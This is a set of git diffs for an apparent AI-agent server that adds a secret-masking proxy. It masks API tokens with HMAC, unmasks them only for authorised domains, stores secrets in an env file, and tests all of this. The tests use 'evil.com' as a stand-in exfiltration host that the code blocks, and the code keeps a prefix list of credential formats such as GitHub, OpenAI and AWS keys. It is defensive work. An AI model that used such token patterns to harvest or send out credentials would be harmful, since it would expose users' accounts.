+ * Uses Node's crypto.subtle (available since Node 15).
+ */
+
+import { subtle } from 'node:crypto';
+
+// ---------- Known token prefixes ----------
+
+const KNOWN_PREFIXES: string[] = [
+  'ghp_',
+  'gho_',
+  'ghu_',
+  'ghs_',
+  'ghr_',
+  'github_pat_',
+  'sk-',
+  'pk-',
+  'xoxb-',
+  'xoxp-',
+  'xoxa-',
+  'xoxs-',
+  'AKIA',
+  'ABIA',
+  'ACCA',
+  'ASIA',
+  'sk-ant-',
+  'Bearer ',
+];
+
+const SORTED_PREFIXES = [...KNOWN_PREFIXES].sort((a, b) => b.length - a.length);
+
+function detectPrefix(value: string): string {
+  for (const p of SORTED_PREFIXES) {
+    if (value.startsWith(p)) return p;
+  }
+  return '';
+}
+
+// ---------- HMAC-SHA256 ----------
+
+async function hmacSha256(key: string, message: string): Promise<Uint8Array> {
+  const enc = new TextEncoder();
+  const cryptoKey = await subtle.importKey(
+    'raw',
+    enc.encode(key),
+    { name: 'HMAC', hash: 'SHA-256' },
+    false,
+    ['sign']
+  );
+  const sig = await subtle.sign('HMAC', cryptoKey, enc.encode(message));
+  return new Uint8Array(sig);
+}
+
+function toHex(bytes: Uint8Array): string {
+  return Array.from(bytes)
+    .map((b) => b.toString(16).padStart(2, '0'))
+    .join('');
+}
+
+// ---------- Public API ----------
+
+/**
+ * Produce a deterministic, format-preserving masked value.
+ */
+export async function mask(
+  sessionId: string,
+  secretName: string,
+  realValue: string
+): Promise<string> {
+  const prefix = detectPrefix(realValue);
+  const remainder = realValue.slice(prefix.length);
+
+  const hmac = await hmacSha256(sessionId + secretName, realValue);
+  let hex = toHex(hmac);
+
+  while (hex.length < remainder.length) hex += hex;
+  const maskedRemainder = hex.slice(0, remainder.length);
+
+  return prefix + maskedRemainder;
+}
+
+export interface SecretPair {
+  realValue: string;
+  maskedValue: string;
+}
+
+/**
+ * Build a reusable scrubber function that replaces every occurrence
+ * of any `realValue` with its `maskedValue`.
+ */
+export function buildScrubber(secrets: SecretPair[]): (text: string) => string {
+  if (secrets.length === 0) return (t) => t;
+
+  const sorted = [...secrets].sort((a, b) => b.realValue.length - a.realValue.length);
+
+  return (text: string): string => {
+    let result = text;
+    for (const { realValue, maskedValue } of sorted) {
+      if (result.includes(realValue)) {
+        result = result.split(realValue).join(maskedValue);
+      }
+    }
+    return result;
+  };
+}

--- a/packages/node-server/src/secrets/proxy-manager.ts
+++ b/packages/node-server/src/secrets/proxy-manager.ts
@@ -7,7 +7,7 @@
  */
 
 import { randomUUID } from 'node:crypto';
-import { mask, buildScrubber, type SecretPair } from '../../../webapp/src/core/secret-masking.js';
+import { mask, buildScrubber, type SecretPair } from './masking.js';
 import { EnvSecretStore } from './env-secret-store.js';
 import { matchesDomains } from './domain-match.js';
 import type { Secret } from './types.js';

--- a/packages/node-server/src/secrets/proxy-manager.ts
+++ b/packages/node-server/src/secrets/proxy-manager.ts
@@ -1,0 +1,152 @@
+/**
+ * SecretProxyManager — bridges EnvSecretStore with the masking engine
+ * for the fetch-proxy handler.
+ *
+ * On init: loads all secrets, generates session-scoped masked values,
+ * and builds lookup tables for fast replacement.
+ */
+
+import { randomUUID } from 'node:crypto';
+import { mask, buildScrubber, type SecretPair } from '../../../webapp/src/core/secret-masking.js';
+import { EnvSecretStore } from './env-secret-store.js';
+import { matchesDomains } from './domain-match.js';
+import type { Secret } from './types.js';
+
+export interface MaskedSecret {
+  name: string;
+  maskedValue: string;
+  realValue: string;
+  domains: string[];
+}
+
+export class SecretProxyManager {
+  private readonly store: EnvSecretStore;
+  private readonly sessionId: string;
+
+  /** maskedValue → MaskedSecret */
+  private maskedToSecret = new Map<string, MaskedSecret>();
+
+  /** Scrubber that replaces real→masked in response content */
+  private scrubber: (text: string) => string = (t) => t;
+
+  constructor(store?: EnvSecretStore, sessionId?: string) {
+    this.store = store ?? new EnvSecretStore();
+    this.sessionId = sessionId ?? randomUUID();
+  }
+
+  /**
+   * Load secrets from the store and generate masked values.
+   * Call once on startup and again whenever secrets change.
+   */
+  async reload(): Promise<void> {
+    const entries = this.store.list();
+    const newMap = new Map<string, MaskedSecret>();
+    const pairs: SecretPair[] = [];
+
+    for (const entry of entries) {
+      const secret = this.store.get(entry.name);
+      if (!secret) continue;
+
+      const maskedValue = await mask(this.sessionId, secret.name, secret.value);
+      const ms: MaskedSecret = {
+        name: secret.name,
+        maskedValue,
+        realValue: secret.value,
+        domains: secret.domains,
+      };
+      newMap.set(maskedValue, ms);
+      pairs.push({ realValue: secret.value, maskedValue });
+    }
+
+    this.maskedToSecret = newMap;
+    this.scrubber = buildScrubber(pairs);
+  }
+
+  /**
+   * Check if any secrets are loaded.
+   */
+  hasSecrets(): boolean {
+    return this.maskedToSecret.size > 0;
+  }
+
+  /**
+   * Get all masked entries (name + maskedValue + domains) for env population.
+   */
+  getMaskedEntries(): Array<{ name: string; maskedValue: string; domains: string[] }> {
+    return Array.from(this.maskedToSecret.values()).map((ms) => ({
+      name: ms.name,
+      maskedValue: ms.maskedValue,
+      domains: ms.domains,
+    }));
+  }
+
+  /**
+   * Unmask a text blob: replace masked values with real values.
+   * Validates each secret against the target hostname.
+   *
+   * @returns { text, forbidden } — forbidden is set if a secret was blocked.
+   */
+  unmask(
+    text: string,
+    targetHostname: string
+  ): { text: string; forbidden?: { secretName: string; hostname: string } } {
+    let result = text;
+
+    for (const [maskedValue, ms] of this.maskedToSecret) {
+      if (!result.includes(maskedValue)) continue;
+
+      if (!matchesDomains(targetHostname, ms.domains)) {
+        return {
+          text: result,
+          forbidden: { secretName: ms.name, hostname: targetHostname },
+        };
+      }
+
+      // Replace all occurrences
+      result = result.split(maskedValue).join(ms.realValue);
+    }
+
+    return { text: result };
+  }
+
+  /**
+   * Unmask headers in-place. Returns forbidden info if blocked.
+   */
+  unmaskHeaders(
+    headers: Record<string, string>,
+    targetHostname: string
+  ): { forbidden?: { secretName: string; hostname: string } } {
+    for (const key of Object.keys(headers)) {
+      const val = headers[key];
+      const { text, forbidden } = this.unmask(val, targetHostname);
+      if (forbidden) return { forbidden };
+      headers[key] = text;
+    }
+    return {};
+  }
+
+  /**
+   * Scrub real secret values from response text → masked values.
+   */
+  scrubResponse(text: string): string {
+    return this.scrubber(text);
+  }
+
+  /**
+   * Scrub headers: replace real values with masked in header values.
+   */
+  scrubHeaders(headers: Headers): Record<string, string> {
+    const result: Record<string, string> = {};
+    headers.forEach((v, k) => {
+      result[k] = this.scrubber(v);
+    });
+    return result;
+  }
+
+  /**
+   * Look up a secret by its masked value.
+   */
+  getByMaskedValue(maskedValue: string): MaskedSecret | undefined {
+    return this.maskedToSecret.get(maskedValue);
+  }
+}

--- a/packages/node-server/src/secrets/proxy-manager.ts
+++ b/packages/node-server/src/secrets/proxy-manager.ts
@@ -110,6 +110,30 @@ export class SecretProxyManager {
   }
 
   /**
+   * Unmask body text: replace masked values with real values when domain matches.
+   * When domain does NOT match, the masked value is left as-is (not rejected).
+   * This is safe because the masked value is meaningless to the remote service —
+   * it's typically just conversation context sent to an LLM API.
+   */
+  unmaskBody(text: string, targetHostname: string): { text: string } {
+    let result = text;
+
+    for (const [maskedValue, ms] of this.maskedToSecret) {
+      if (!result.includes(maskedValue)) continue;
+
+      if (!matchesDomains(targetHostname, ms.domains)) {
+        // Leave the masked value as-is — do not reject, do not unmask
+        continue;
+      }
+
+      // Replace all occurrences
+      result = result.split(maskedValue).join(ms.realValue);
+    }
+
+    return { text: result };
+  }
+
+  /**
    * Unmask headers in-place. Returns forbidden info if blocked.
    */
   unmaskHeaders(

--- a/packages/node-server/src/secrets/types.ts
+++ b/packages/node-server/src/secrets/types.ts
@@ -1,0 +1,34 @@
+/**
+ * A secret with its value and authorized domains.
+ */
+export interface Secret {
+  name: string;
+  value: string;
+  domains: string[];
+}
+
+/**
+ * A secret entry without the value — safe to expose to the agent.
+ */
+export interface SecretEntry {
+  name: string;
+  domains: string[];
+}
+
+/**
+ * SecretStore interface for reading/writing secrets.
+ * Implemented by EnvSecretStore (node-server) and Keychain (swift-server).
+ */
+export interface SecretStore {
+  /** Read a secret by name. Returns null if not found or has no _DOMAINS entry. */
+  get(name: string): Secret | null;
+
+  /** Write a secret with its value and authorized domains. */
+  set(name: string, value: string, domains: string[]): void;
+
+  /** Remove a secret and its _DOMAINS entry. */
+  delete(name: string): void;
+
+  /** List all secrets with their domains (never values). */
+  list(): SecretEntry[];
+}

--- a/packages/node-server/tests/integration/server/server-api.test.ts
+++ b/packages/node-server/tests/integration/server/server-api.test.ts
@@ -338,59 +338,31 @@ describe('shared server API conformance', () => {
     openSockets.add(socket);
   });
 
-  it('manages secrets via the /api/secrets REST API', async () => {
-    const testName = `INTTEST_${Date.now()}`;
-
-    // POST — create a secret
-    const create = await fetchFromServer('/api/secrets', {
-      method: 'POST',
-      headers: { 'content-type': 'application/json' },
-      body: JSON.stringify({ name: testName, value: 'test_val', domains: ['api.test.com'] }),
-    });
-    expect(create.status).toBe(200);
-    await expect(create.json()).resolves.toEqual({ ok: true, name: testName });
-
-    // GET — list secrets (should include the created one)
+  it('lists secrets via GET /api/secrets', async () => {
     const list = await fetchFromServer('/api/secrets');
     expect(list.status).toBe(200);
     const entries = (await list.json()) as Array<{ name: string; domains: string[] }>;
-    const found = entries.find((e) => e.name === testName);
-    expect(found).toBeDefined();
-    expect(found!.domains).toEqual(['api.test.com']);
+    expect(Array.isArray(entries)).toBe(true);
     // Value must never be returned
-    expect((found as Record<string, unknown>)['value']).toBeUndefined();
-
-    // DELETE — remove the secret
-    const del = await fetchFromServer(`/api/secrets/${testName}`, { method: 'DELETE' });
-    expect(del.status).toBe(200);
-    await expect(del.json()).resolves.toEqual({ ok: true, name: testName });
-
-    // Verify it's gone
-    const listAfter = await fetchFromServer('/api/secrets');
-    const entriesAfter = (await listAfter.json()) as Array<{ name: string }>;
-    expect(entriesAfter.find((e) => e.name === testName)).toBeUndefined();
+    for (const entry of entries) {
+      expect((entry as Record<string, unknown>)['value']).toBeUndefined();
+    }
   });
 
-  it('rejects secret creation with missing name', async () => {
+  it('rejects POST /api/secrets (write route removed)', async () => {
     const res = await fetchFromServer('/api/secrets', {
       method: 'POST',
       headers: { 'content-type': 'application/json' },
-      body: JSON.stringify({ value: 'v', domains: ['d.com'] }),
+      body: JSON.stringify({ name: 'INTTEST_BLOCKED', value: 'v', domains: ['d.com'] }),
     });
-    expect(res.status).toBe(400);
-    const body = (await res.json()) as Record<string, unknown>;
-    expect(body['error']).toBeDefined();
+    // Express returns 404 for unmatched routes
+    expect(res.status).toBeGreaterThanOrEqual(400);
   });
 
-  it('rejects secret creation with empty domains', async () => {
-    const res = await fetchFromServer('/api/secrets', {
-      method: 'POST',
-      headers: { 'content-type': 'application/json' },
-      body: JSON.stringify({ name: 'INTTEST_NODOMAIN', value: 'v', domains: [] }),
-    });
-    expect(res.status).toBe(400);
-    const body = (await res.json()) as Record<string, unknown>;
-    expect(body['error']).toBeDefined();
+  it('rejects DELETE /api/secrets/:name (write route removed)', async () => {
+    const res = await fetchFromServer('/api/secrets/INTTEST_BLOCKED', { method: 'DELETE' });
+    // Express returns 404 for unmatched routes
+    expect(res.status).toBeGreaterThanOrEqual(400);
   });
 
   it('returns structured responses from lick-backed REST endpoints based on browser connectivity', async () => {

--- a/packages/node-server/tests/integration/server/server-api.test.ts
+++ b/packages/node-server/tests/integration/server/server-api.test.ts
@@ -338,6 +338,61 @@ describe('shared server API conformance', () => {
     openSockets.add(socket);
   });
 
+  it('manages secrets via the /api/secrets REST API', async () => {
+    const testName = `INTTEST_${Date.now()}`;
+
+    // POST — create a secret
+    const create = await fetchFromServer('/api/secrets', {
+      method: 'POST',
+      headers: { 'content-type': 'application/json' },
+      body: JSON.stringify({ name: testName, value: 'test_val', domains: ['api.test.com'] }),
+    });
+    expect(create.status).toBe(200);
+    await expect(create.json()).resolves.toEqual({ ok: true, name: testName });
+
+    // GET — list secrets (should include the created one)
+    const list = await fetchFromServer('/api/secrets');
+    expect(list.status).toBe(200);
+    const entries = (await list.json()) as Array<{ name: string; domains: string[] }>;
+    const found = entries.find((e) => e.name === testName);
+    expect(found).toBeDefined();
+    expect(found!.domains).toEqual(['api.test.com']);
+    // Value must never be returned
+    expect((found as Record<string, unknown>)['value']).toBeUndefined();
+
+    // DELETE — remove the secret
+    const del = await fetchFromServer(`/api/secrets/${testName}`, { method: 'DELETE' });
+    expect(del.status).toBe(200);
+    await expect(del.json()).resolves.toEqual({ ok: true, name: testName });
+
+    // Verify it's gone
+    const listAfter = await fetchFromServer('/api/secrets');
+    const entriesAfter = (await listAfter.json()) as Array<{ name: string }>;
+    expect(entriesAfter.find((e) => e.name === testName)).toBeUndefined();
+  });
+
+  it('rejects secret creation with missing name', async () => {
+    const res = await fetchFromServer('/api/secrets', {
+      method: 'POST',
+      headers: { 'content-type': 'application/json' },
+      body: JSON.stringify({ value: 'v', domains: ['d.com'] }),
+    });
+    expect(res.status).toBe(400);
+    const body = (await res.json()) as Record<string, unknown>;
+    expect(body['error']).toBeDefined();
+  });
+
+  it('rejects secret creation with empty domains', async () => {
+    const res = await fetchFromServer('/api/secrets', {
+      method: 'POST',
+      headers: { 'content-type': 'application/json' },
+      body: JSON.stringify({ name: 'INTTEST_NODOMAIN', value: 'v', domains: [] }),
+    });
+    expect(res.status).toBe(400);
+    const body = (await res.json()) as Record<string, unknown>;
+    expect(body['error']).toBeDefined();
+  });
+
   it('returns structured responses from lick-backed REST endpoints based on browser connectivity', async () => {
     const endpoints = [
       {

--- a/packages/node-server/tests/runtime-flags.test.ts
+++ b/packages/node-server/tests/runtime-flags.test.ts
@@ -24,6 +24,7 @@ describe('parseCliRuntimeFlags', () => {
       logLevel: 'info',
       logDir: null,
       prompt: null,
+      envFile: null,
       version: false,
     });
   });
@@ -45,6 +46,7 @@ describe('parseCliRuntimeFlags', () => {
       logLevel: 'info',
       logDir: null,
       prompt: null,
+      envFile: null,
       version: false,
     });
   });
@@ -74,6 +76,7 @@ describe('parseCliRuntimeFlags', () => {
       logLevel: 'info',
       logDir: null,
       prompt: null,
+      envFile: null,
       version: false,
     });
   });
@@ -97,6 +100,7 @@ describe('parseCliRuntimeFlags', () => {
       logLevel: 'info',
       logDir: null,
       prompt: null,
+      envFile: null,
       version: false,
     });
   });
@@ -118,6 +122,7 @@ describe('parseCliRuntimeFlags', () => {
       logLevel: 'info',
       logDir: null,
       prompt: null,
+      envFile: null,
       version: false,
     });
   });
@@ -139,6 +144,7 @@ describe('parseCliRuntimeFlags', () => {
       logLevel: 'info',
       logDir: null,
       prompt: null,
+      envFile: null,
       version: false,
     });
   });
@@ -160,6 +166,7 @@ describe('parseCliRuntimeFlags', () => {
       logLevel: 'info',
       logDir: null,
       prompt: null,
+      envFile: null,
       version: false,
     });
   });
@@ -181,6 +188,7 @@ describe('parseCliRuntimeFlags', () => {
       logLevel: 'info',
       logDir: null,
       prompt: null,
+      envFile: null,
       version: false,
     });
   });
@@ -227,6 +235,7 @@ describe('parseCliRuntimeFlags', () => {
       logLevel: 'info',
       logDir: null,
       prompt: null,
+      envFile: null,
       version: false,
     });
   });
@@ -248,6 +257,7 @@ describe('parseCliRuntimeFlags', () => {
       logLevel: 'info',
       logDir: null,
       prompt: null,
+      envFile: null,
       version: false,
     });
   });

--- a/packages/node-server/tests/secrets/domain-match.test.ts
+++ b/packages/node-server/tests/secrets/domain-match.test.ts
@@ -1,0 +1,54 @@
+import { describe, expect, it } from 'vitest';
+import { matchDomain, matchesDomains } from '../../src/secrets/domain-match.js';
+
+describe('matchDomain', () => {
+  it('matches exact domain', () => {
+    expect(matchDomain('api.github.com', 'api.github.com')).toBe(true);
+  });
+
+  it('is case-insensitive', () => {
+    expect(matchDomain('API.GitHub.COM', 'api.github.com')).toBe(true);
+    expect(matchDomain('api.github.com', 'API.GITHUB.COM')).toBe(true);
+  });
+
+  it('does not match different domains', () => {
+    expect(matchDomain('evil.com', 'api.github.com')).toBe(false);
+  });
+
+  it('matches wildcard subdomain pattern', () => {
+    expect(matchDomain('api.github.com', '*.github.com')).toBe(true);
+    expect(matchDomain('raw.github.com', '*.github.com')).toBe(true);
+  });
+
+  it('wildcard does not match the base domain itself', () => {
+    expect(matchDomain('github.com', '*.github.com')).toBe(false);
+  });
+
+  it('wildcard does not match unrelated domains', () => {
+    expect(matchDomain('evil.com', '*.github.com')).toBe(false);
+    expect(matchDomain('github.com.evil.com', '*.github.com')).toBe(false);
+  });
+
+  it('matches deep subdomains with wildcard', () => {
+    expect(matchDomain('a.b.github.com', '*.github.com')).toBe(true);
+  });
+
+  it('matches bare wildcard *', () => {
+    expect(matchDomain('anything.com', '*')).toBe(true);
+    expect(matchDomain('api.github.com', '*')).toBe(true);
+  });
+});
+
+describe('matchesDomains', () => {
+  it('returns true if any pattern matches', () => {
+    expect(matchesDomains('api.github.com', ['api.openai.com', '*.github.com'])).toBe(true);
+  });
+
+  it('returns false if no pattern matches', () => {
+    expect(matchesDomains('evil.com', ['api.openai.com', '*.github.com'])).toBe(false);
+  });
+
+  it('returns false for empty patterns list', () => {
+    expect(matchesDomains('api.github.com', [])).toBe(false);
+  });
+});

--- a/packages/node-server/tests/secrets/env-file.test.ts
+++ b/packages/node-server/tests/secrets/env-file.test.ts
@@ -1,0 +1,70 @@
+import { describe, expect, it } from 'vitest';
+import { parseEnvFile, serializeEnvFile } from '../../src/secrets/env-file.js';
+
+describe('parseEnvFile', () => {
+  it('parses simple KEY=VALUE lines', () => {
+    const content = 'FOO=bar\nBAZ=qux\n';
+    expect(parseEnvFile(content)).toEqual([
+      { key: 'FOO', value: 'bar' },
+      { key: 'BAZ', value: 'qux' },
+    ]);
+  });
+
+  it('skips blank lines and comments', () => {
+    const content = '# comment\n\nFOO=bar\n\n# another\nBAZ=qux\n';
+    expect(parseEnvFile(content)).toEqual([
+      { key: 'FOO', value: 'bar' },
+      { key: 'BAZ', value: 'qux' },
+    ]);
+  });
+
+  it('strips double quotes from values', () => {
+    expect(parseEnvFile('KEY="hello world"')).toEqual([{ key: 'KEY', value: 'hello world' }]);
+  });
+
+  it('strips single quotes from values', () => {
+    expect(parseEnvFile("KEY='hello world'")).toEqual([{ key: 'KEY', value: 'hello world' }]);
+  });
+
+  it('handles values containing = signs', () => {
+    expect(parseEnvFile('KEY=abc=def=ghi')).toEqual([{ key: 'KEY', value: 'abc=def=ghi' }]);
+  });
+
+  it('handles empty values', () => {
+    expect(parseEnvFile('KEY=')).toEqual([{ key: 'KEY', value: '' }]);
+  });
+
+  it('skips lines without =', () => {
+    expect(parseEnvFile('MALFORMED\nKEY=val')).toEqual([{ key: 'KEY', value: 'val' }]);
+  });
+
+  it('trims whitespace around keys and values', () => {
+    expect(parseEnvFile('  KEY  =  value  ')).toEqual([{ key: 'KEY', value: 'value' }]);
+  });
+});
+
+describe('serializeEnvFile', () => {
+  it('serializes entries to KEY=VALUE format', () => {
+    const result = serializeEnvFile([
+      { key: 'A', value: 'one' },
+      { key: 'B', value: 'two' },
+    ]);
+    expect(result).toBe('A=one\nB=two\n');
+  });
+
+  it('quotes values with spaces', () => {
+    const result = serializeEnvFile([{ key: 'K', value: 'hello world' }]);
+    expect(result).toBe('K="hello world"\n');
+  });
+
+  it('quotes values with # characters', () => {
+    const result = serializeEnvFile([{ key: 'K', value: 'val#comment' }]);
+    expect(result).toBe('K="val#comment"\n');
+  });
+
+  it('round-trips parsed content', () => {
+    const original = 'FOO=bar\nBAZ=qux\n';
+    const parsed = parseEnvFile(original);
+    expect(serializeEnvFile(parsed)).toBe(original);
+  });
+});

--- a/packages/node-server/tests/secrets/env-secret-store.test.ts
+++ b/packages/node-server/tests/secrets/env-secret-store.test.ts
@@ -1,0 +1,117 @@
+import { describe, expect, it, beforeEach, afterEach } from 'vitest';
+import { mkdtempSync, rmSync, readFileSync, statSync } from 'node:fs';
+import { join } from 'node:path';
+import { tmpdir } from 'node:os';
+import { EnvSecretStore } from '../../src/secrets/env-secret-store.js';
+
+describe('EnvSecretStore', () => {
+  let tmpDir: string;
+  let filePath: string;
+  let store: EnvSecretStore;
+
+  beforeEach(() => {
+    tmpDir = mkdtempSync(join(tmpdir(), 'slicc-secrets-test-'));
+    filePath = join(tmpDir, 'secrets.env');
+    store = new EnvSecretStore(filePath);
+  });
+
+  afterEach(() => {
+    rmSync(tmpDir, { recursive: true, force: true });
+  });
+
+  it('returns null for non-existent secret', () => {
+    expect(store.get('NOPE')).toBeNull();
+  });
+
+  it('sets and gets a secret', () => {
+    store.set('GITHUB_TOKEN', 'ghp_abc123', ['api.github.com', '*.github.com']);
+    const secret = store.get('GITHUB_TOKEN');
+    expect(secret).toEqual({
+      name: 'GITHUB_TOKEN',
+      value: 'ghp_abc123',
+      domains: ['api.github.com', '*.github.com'],
+    });
+  });
+
+  it('lists secrets without values', () => {
+    store.set('A_KEY', 'secret1', ['api.a.com']);
+    store.set('B_KEY', 'secret2', ['api.b.com', '*.b.com']);
+    const list = store.list();
+    expect(list).toEqual([
+      { name: 'A_KEY', domains: ['api.a.com'] },
+      { name: 'B_KEY', domains: ['api.b.com', '*.b.com'] },
+    ]);
+  });
+
+  it('deletes a secret', () => {
+    store.set('DEL_ME', 'val', ['example.com']);
+    expect(store.get('DEL_ME')).not.toBeNull();
+    store.delete('DEL_ME');
+    expect(store.get('DEL_ME')).toBeNull();
+    expect(store.list()).toEqual([]);
+  });
+
+  it('updates an existing secret', () => {
+    store.set('TOK', 'old', ['old.com']);
+    store.set('TOK', 'new', ['new.com']);
+    expect(store.get('TOK')).toEqual({
+      name: 'TOK',
+      value: 'new',
+      domains: ['new.com'],
+    });
+    // Should not duplicate entries
+    const content = readFileSync(filePath, 'utf-8');
+    const tokCount = content.split('\n').filter((l) => l.startsWith('TOK=')).length;
+    expect(tokCount).toBe(1);
+  });
+
+  it('rejects secrets without domains', () => {
+    expect(() => store.set('NO_DOM', 'val', [])).toThrow(
+      'must have at least one authorized domain'
+    );
+  });
+
+  it('returns null for secret without _DOMAINS entry', () => {
+    // Manually write a secret without domains
+    const { writeFileSync } = require('node:fs');
+    writeFileSync(filePath, 'ORPHAN=value\n');
+    expect(store.get('ORPHAN')).toBeNull();
+  });
+
+  it('creates the file with restricted permissions', () => {
+    store.set('X', 'val', ['x.com']);
+    const stats = statSync(filePath);
+    // 0o600 = owner read/write only
+    const mode = stats.mode & 0o777;
+    expect(mode).toBe(0o600);
+  });
+
+  it('creates parent directories if they do not exist', () => {
+    const deepPath = join(tmpDir, 'sub', 'dir', 'secrets.env');
+    const deepStore = new EnvSecretStore(deepPath);
+    deepStore.set('DEEP', 'val', ['deep.com']);
+    expect(deepStore.get('DEEP')).toEqual({
+      name: 'DEEP',
+      value: 'val',
+      domains: ['deep.com'],
+    });
+  });
+
+  it('skips _DOMAINS keys when listing secret names', () => {
+    store.set('MY_SECRET', 'val', ['my.com']);
+    const list = store.list();
+    expect(list.map((e) => e.name)).toEqual(['MY_SECRET']);
+    // _DOMAINS entry should not appear as a separate secret
+    expect(list.some((e) => e.name.endsWith('_DOMAINS'))).toBe(false);
+  });
+
+  it('persists across store instances', () => {
+    store.set('PERSIST', 'val', ['p.com']);
+    const store2 = new EnvSecretStore(filePath);
+    expect(store2.get('PERSIST')).toEqual({
+      name: 'PERSIST',
+      value: 'val',
+      domains: ['p.com'],
+    });
+  });
+});

--- a/packages/node-server/tests/secrets/proxy-manager.test.ts
+++ b/packages/node-server/tests/secrets/proxy-manager.test.ts
@@ -1,5 +1,5 @@
 import { describe, it, expect, beforeEach } from 'vitest';
-import { writeFileSync, mkdirSync, rmSync } from 'node:fs';
+import { writeFileSync, mkdirSync } from 'node:fs';
 import { join } from 'node:path';
 import { tmpdir } from 'node:os';
 import { randomUUID } from 'node:crypto';

--- a/packages/node-server/tests/secrets/proxy-manager.test.ts
+++ b/packages/node-server/tests/secrets/proxy-manager.test.ts
@@ -138,6 +138,43 @@ describe('SecretProxyManager', () => {
     expect(emptyManager.scrubResponse('text')).toBe('text');
   });
 
+  it('unmaskBody leaves masked value intact when domain does not match', async () => {
+    await manager.reload();
+    const gh = manager.getMaskedEntries().find((e) => e.name === 'GITHUB_TOKEN')!;
+
+    // Body contains masked value but domain doesn't match — should NOT reject,
+    // should leave the masked value as-is
+    const body = JSON.stringify({
+      messages: [{ role: 'assistant', content: `Used token ${gh.maskedValue} to call API` }],
+    });
+    const result = manager.unmaskBody(body, 'bedrock-runtime.us-west-2.amazonaws.com');
+    expect(result.text).toContain(gh.maskedValue);
+    expect(result.text).not.toContain('ghp_realtoken123456789abcdef');
+  });
+
+  it('unmaskBody replaces masked value when domain matches', async () => {
+    await manager.reload();
+    const gh = manager.getMaskedEntries().find((e) => e.name === 'GITHUB_TOKEN')!;
+
+    const body = JSON.stringify({ token: gh.maskedValue });
+    const result = manager.unmaskBody(body, 'api.github.com');
+    expect(result.text).not.toContain(gh.maskedValue);
+    expect(result.text).toContain('ghp_realtoken123456789abcdef');
+  });
+
+  it('unmaskBody partially unmasks when some domains match and some do not', async () => {
+    await manager.reload();
+    const gh = manager.getMaskedEntries().find((e) => e.name === 'GITHUB_TOKEN')!;
+    const oai = manager.getMaskedEntries().find((e) => e.name === 'OPENAI_KEY')!;
+
+    // Send to api.github.com — GITHUB_TOKEN should unmask, OPENAI_KEY should stay masked
+    const body = `gh=${gh.maskedValue} oai=${oai.maskedValue}`;
+    const result = manager.unmaskBody(body, 'api.github.com');
+    expect(result.text).toContain('ghp_realtoken123456789abcdef');
+    expect(result.text).toContain(oai.maskedValue);
+    expect(result.text).not.toContain('sk-realopenaikey999888777');
+  });
+
   it('produces deterministic masked values for same session', async () => {
     await manager.reload();
     const entries1 = manager.getMaskedEntries();

--- a/packages/node-server/tests/secrets/proxy-manager.test.ts
+++ b/packages/node-server/tests/secrets/proxy-manager.test.ts
@@ -1,0 +1,154 @@
+import { describe, it, expect, beforeEach } from 'vitest';
+import { writeFileSync, mkdirSync, rmSync } from 'node:fs';
+import { join } from 'node:path';
+import { tmpdir } from 'node:os';
+import { randomUUID } from 'node:crypto';
+import { EnvSecretStore } from '../../src/secrets/env-secret-store.js';
+import { SecretProxyManager } from '../../src/secrets/proxy-manager.js';
+
+function createTempSecretsFile(content: string): string {
+  const dir = join(tmpdir(), `slicc-test-${randomUUID()}`);
+  mkdirSync(dir, { recursive: true });
+  const file = join(dir, 'secrets.env');
+  writeFileSync(file, content, { mode: 0o600 });
+  return file;
+}
+
+describe('SecretProxyManager', () => {
+  let filePath: string;
+  let manager: SecretProxyManager;
+
+  beforeEach(() => {
+    filePath = createTempSecretsFile(
+      [
+        'GITHUB_TOKEN=ghp_realtoken123456789abcdef',
+        'GITHUB_TOKEN_DOMAINS=api.github.com,*.github.com',
+        'OPENAI_KEY=sk-realopenaikey999888777',
+        'OPENAI_KEY_DOMAINS=api.openai.com',
+      ].join('\n')
+    );
+
+    const store = new EnvSecretStore(filePath);
+    manager = new SecretProxyManager(store, 'test-session-id');
+  });
+
+  it('loads secrets and generates masked values', async () => {
+    await manager.reload();
+    expect(manager.hasSecrets()).toBe(true);
+
+    const entries = manager.getMaskedEntries();
+    expect(entries).toHaveLength(2);
+
+    const gh = entries.find((e) => e.name === 'GITHUB_TOKEN');
+    expect(gh).toBeDefined();
+    expect(gh!.maskedValue).not.toBe('ghp_realtoken123456789abcdef');
+    // Masked value should preserve the ghp_ prefix
+    expect(gh!.maskedValue.startsWith('ghp_')).toBe(true);
+    expect(gh!.maskedValue.length).toBe('ghp_realtoken123456789abcdef'.length);
+
+    const oai = entries.find((e) => e.name === 'OPENAI_KEY');
+    expect(oai).toBeDefined();
+    expect(oai!.maskedValue.startsWith('sk-')).toBe(true);
+  });
+
+  it('unmasks text when domain is allowed', async () => {
+    await manager.reload();
+    const gh = manager.getMaskedEntries().find((e) => e.name === 'GITHUB_TOKEN')!;
+
+    const result = manager.unmask(`Bearer ${gh.maskedValue}`, 'api.github.com');
+    expect(result.forbidden).toBeUndefined();
+    expect(result.text).toBe('Bearer ghp_realtoken123456789abcdef');
+  });
+
+  it('blocks unmask when domain is not allowed', async () => {
+    await manager.reload();
+    const gh = manager.getMaskedEntries().find((e) => e.name === 'GITHUB_TOKEN')!;
+
+    const result = manager.unmask(`Bearer ${gh.maskedValue}`, 'evil.com');
+    expect(result.forbidden).toBeDefined();
+    expect(result.forbidden!.secretName).toBe('GITHUB_TOKEN');
+    expect(result.forbidden!.hostname).toBe('evil.com');
+  });
+
+  it('allows wildcard subdomain matching', async () => {
+    await manager.reload();
+    const gh = manager.getMaskedEntries().find((e) => e.name === 'GITHUB_TOKEN')!;
+
+    const result = manager.unmask(`Bearer ${gh.maskedValue}`, 'uploads.github.com');
+    expect(result.forbidden).toBeUndefined();
+    expect(result.text).toBe('Bearer ghp_realtoken123456789abcdef');
+  });
+
+  it('unmasks headers and rejects on domain mismatch', async () => {
+    await manager.reload();
+    const oai = manager.getMaskedEntries().find((e) => e.name === 'OPENAI_KEY')!;
+
+    // Allowed domain
+    const headers1: Record<string, string> = {
+      authorization: `Bearer ${oai.maskedValue}`,
+      'content-type': 'application/json',
+    };
+    const r1 = manager.unmaskHeaders(headers1, 'api.openai.com');
+    expect(r1.forbidden).toBeUndefined();
+    expect(headers1['authorization']).toBe('Bearer sk-realopenaikey999888777');
+
+    // Disallowed domain
+    const headers2: Record<string, string> = {
+      authorization: `Bearer ${oai.maskedValue}`,
+    };
+    const r2 = manager.unmaskHeaders(headers2, 'evil.com');
+    expect(r2.forbidden).toBeDefined();
+    expect(r2.forbidden!.secretName).toBe('OPENAI_KEY');
+  });
+
+  it('scrubs real values from response text', async () => {
+    await manager.reload();
+    const responseBody = JSON.stringify({
+      token: 'ghp_realtoken123456789abcdef',
